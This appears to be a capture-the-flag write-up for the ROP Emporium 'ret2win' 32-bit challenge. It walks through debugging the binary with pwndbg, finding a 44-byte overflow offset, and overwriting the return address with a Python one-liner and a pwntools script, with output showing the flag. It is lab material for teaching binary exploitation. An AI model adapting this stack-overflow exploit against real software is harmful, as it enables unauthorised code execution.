Binary Exploitation (Pwn)

This section will talk about CTF writeup.

ROP Emporium

https://ropemporium.com/

To download all challenge:

https://ropemporium.com/binary/rop_emporium_all_challenges.zip

Ret2win

When we run the program and enter a bunch of a . It was segmentation fault

┌─[sheinn101@parrot]─[~/ctf/rop_emporium/ret2win]
└──╼ [??]$ ./ret2win32 
ret2win by ROP Emporium
x86

For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!
What could possibly go wrong?
You there, may I have your input please? And don't worry about null bytes, we're using read()!

> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Thank you!
Segmentation fault

info functions

pwndbg> info functions                                                                                                                                                
All defined functions:                                                                                                                                                
                                                                                                                                                                      
Non-debugging symbols:                                                                                                                                                
0x08048374  _init                                                                                                                                                     
0x080483b0  read@plt                                                                                                                                                  
0x080483c0  printf@plt                                                                                                                                                
0x080483d0  puts@plt                                                                                                                                                  
0x080483e0  system@plt                                                                                                                                                
0x080483f0  __libc_start_main@plt                                                                                                                                     
0x08048400  setvbuf@plt                                                            
0x08048410  memset@plt                                                                                                                                                
0x08048420  __gmon_start__@plt                                                                                                                                        
0x08048430  _start                                                                 
0x08048470  _dl_relocate_static_pie                                                                                                                                   
0x08048480  __x86.get_pc_thunk.bx                                                                                                                                     
0x08048490  deregister_tm_clones                                                                                                                                      
0x080484d0  register_tm_clones                                                                                                                                        
0x08048510  __do_global_dtors_aux                                                                                                                                     
0x08048540  frame_dummy
0x08048546  main
0x080485ad  pwnme
0x0804862c  ret2win
0x08048660  __libc_csu_init
0x080486c0  __libc_csu_fini
0x080486c4  _fini

Disassemble ret2win

pwndbg> disassemble ret2win                                                                                                                                           
Dump of assembler code for function ret2win:                                                                                                                          
   0x0804862c <+0>:     push   ebp                                                                                                                                    
   0x0804862d <+1>:     mov    ebp,esp                                                                                                                                
   0x0804862f <+3>:     sub    esp,0x8                                                                                                                                
   0x08048632 <+6>:     sub    esp,0xc                                                                                                                                
   0x08048635 <+9>:     push   0x80487f6                                                                                                                              
   0x0804863a <+14>:    call   0x80483d0 <puts@plt>                                                                                                                   
   0x0804863f <+19>:    add    esp,0x10                                                                                                                               
   0x08048642 <+22>:    sub    esp,0xc                                                                                                                                
   0x08048645 <+25>:    push   0x8048813                                                                                                                              
   0x0804864a <+30>:    call   0x80483e0 <system@plt>                                                                                                                 
   0x0804864f <+35>:    add    esp,0x10                                                                                                                               
   0x08048652 <+38>:    nop                                                                                                                                           
   0x08048653 <+39>:    leave                                                                                                                                         
   0x08048654 <+40>:    ret 

It has system function which is /bin/cat flag.txt

Generate pattern with cyclic , run the program and paste it.

pwndbg> cyclic 100
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
pwndbg>

To know the offset , run cyclic -l laaa .

Now we know the offset is 44 ,So the payload will be like this. A*44 + ret2win address which is cat flag.txt

Check the address of ret2win function

pwndbg> p ret2win
$1 = {<text variable, no debug info>} 0x804862c <ret2win>
pwndbg>

Change it that address to little endian like this \x2c\x86\x04\x08

┌─[sheinn101@parrot]─[~/ctf/rop_emporium/ret2win]
└──╼ [??]$ python -c 'print "A"*44 + "\x2c\x86\x04\x08"' | ./ret2win32 
ret2win by ROP Emporium
x86
For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!
What could possibly go wrong?
You there, may I have your input please? And don't worry about null bytes, we're using read()!

> Thank you!
Well done! Here's your flag:
ROPE{a_placeholder_32byte_flag!}
Segmentation fault

Script with pwntools

#!/usr/bin/python3
from pwn import * 

elf = context.binary = ELF('./ret2win32',checksec=False)
p = process()
padding = 44
payload = flat(
	asm('nop') * padding,
	elf.symbols['ret2win'],
	)
# f = open("payload", "wb")
# f.write(payload)
p.sendlineafter(">", payload)
p.interactive()

─[sheinn101@parrot]─[~/ctf/rop_emporium/ret2win]
└──╼ [??]$ python3 auto_pwn.py 
[+] Starting local process '/home/sheinn101/ctf/rop_emporium/ret2win/ret2win32': pid 432041
[*] Switching to interactive mode
 Thank you!
Well done! Here's your flag:
ROPE{a_placeholder_32byte_flag!}
[*] Got EOF while reading in interactive

Comming Soon...